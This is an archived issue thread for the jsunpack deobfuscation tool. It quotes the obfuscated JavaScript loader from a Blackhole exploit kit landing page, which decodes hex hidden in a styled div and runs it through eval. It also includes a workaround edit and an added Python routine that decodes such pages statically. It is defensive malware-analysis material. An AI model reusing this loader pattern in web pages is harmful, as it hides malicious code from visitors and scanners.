Div Obfuscation causes jsunpack to fail
GoogleCodeExporter opened this issue
Google Code Exporter commented
Jsunpack is not able to handle the latest Blackhole exploit kit, which contains
obfuscation within the div tags.
<html><body><style>#q{color:#fff;}</style><div id="q"
style="display:block;">3320.........
<script>z=function(){c="";
d=11;
for(i=32478-1;i!=-1;i--){
w=i;
v=a[w];
dd=32478-i-2+1;
b=d;
dd=dd-b*Math.floor(dd/d);
k=v*1-(dd-13);
kk=k;
c+=f.fromCharCode(kk);
}
md="a";
try{prototype||123;}catch(dagdsg){if(020==0x10)eval(c);}}
if(window.document)for(i=0;i<document.body.childNodes.length;i++){
if (document.body.childNodes[i].hasAttribute("style"))
if(z)g=document.body.childNodes[i].innerHTML.replace(/hwehes/g,"");
}
a=[];
for(i=0;i<g.length;i+=2){
gg=g.substr(i,0x2);
a.push(parseInt(gg,0x10));
}
try{fwq&prototype}catch(qwrwqr){
if(020==0x10){f=String;
}}
z();
</script>
Attaching a sample file.
Original issue reported on code.google.com by rahulmoh...@gmail.com
on 13 Aug 2012 at 6:16
Google Code Exporter commented
The div is properly parsed; the issue is the call to
document.body.childNodes[i].hasAttribute. I edited the JavaScript in the sample
to prove this, as follows:
//edit start
/*if(window.document)for(i=0;i<document.body.childNodes.length;i++){
if (document.body.childNodes[i].hasAttribute("style"))
if(z)g=document.body.childNodes[i].innerHTML.replace(/hwehes/g,"");
}*/
if(z)g=document.getElementById('q').innerHTML.replace(/hwehes/g,"");
//edit end
Please review the jsunpack submission here:
http://jsunpack.jeek.org/?report=69829f230fea941b3e7d10ae8a6066baf2cea1b4
Original comment by urul...@gmail.com
on 13 Aug 2012 at 2:00
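When the sandbox's DOM emulation fails as described in this thread, the decoding routine from the posted script can be replayed statically for triage. The following is an added example, not part of the original issue or of jsunpack's code: the page and its plaintext are constructed, the names are hypothetical, and the hard-coded count 32478 is generalised to the number of decoded bytes on the assumption that it equals the payload length.

```python
from html.parser import HTMLParser

JUNK = "hwehes"  # filler the script strips with .replace(/hwehes/g, "")
MODULUS = 11     # d=11 in the script
OFFSET = 13      # from k=v*1-(dd-13)

# Constructed sample: same layout as the reported page, harmless plaintext.
SAMPLE_PAGE = (
    '<html><body><style>#q{color:#fff;}</style>'
    '<div id="q" style="display:block;">'
    '2e62hwehes716d6e3663hwehes6616675569</div>'
    '<script>/* decoding script omitted */</script></body></html>'
)

class StyledBodyChild(HTMLParser):
    """Text of direct children of <body> that carry a style attribute,
    mirroring the script's childNodes / hasAttribute("style") loop."""
    def __init__(self):
        super().__init__()
        self.stack, self.depth, self.matches = [], None, []

    def handle_starttag(self, tag, attrs):
        in_body = bool(self.stack) and self.stack[-1] == "body"
        if in_body and "style" in dict(attrs) and self.depth is None:
            self.depth = len(self.stack)
            self.matches.append("")
        self.stack.append(tag)

    def handle_endtag(self, tag):
        if tag in self.stack:
            while self.stack.pop() != tag:
                pass
        if self.depth is not None and len(self.stack) <= self.depth:
            self.depth = None

    def handle_data(self, data):
        if self.depth is not None:
            self.matches[-1] += data

def decode_payload(page):
    """Return the string the script would hand to eval(), without running it."""
    parser = StyledBodyChild()
    parser.feed(page)
    if not parser.matches:
        raise ValueError("no styled direct child of <body>")
    # The script's loop has no break, so the last matching node wins.
    g = parser.matches[-1].replace(JUNK, "")
    a = [int(g[i:i + 2], 16) for i in range(0, len(g), 2)]
    n = len(a)
    # The script walks the array backwards; dd is the output index mod 11.
    return "".join(chr(a[n - 1 - j] - (j % MODULUS) + OFFSET) for j in range(n))
```

The guards around eval in the script (020==0x10 and the try/catch on undefined names) are environment checks and play no part in the decoding arithmetic, so the static replay skips them.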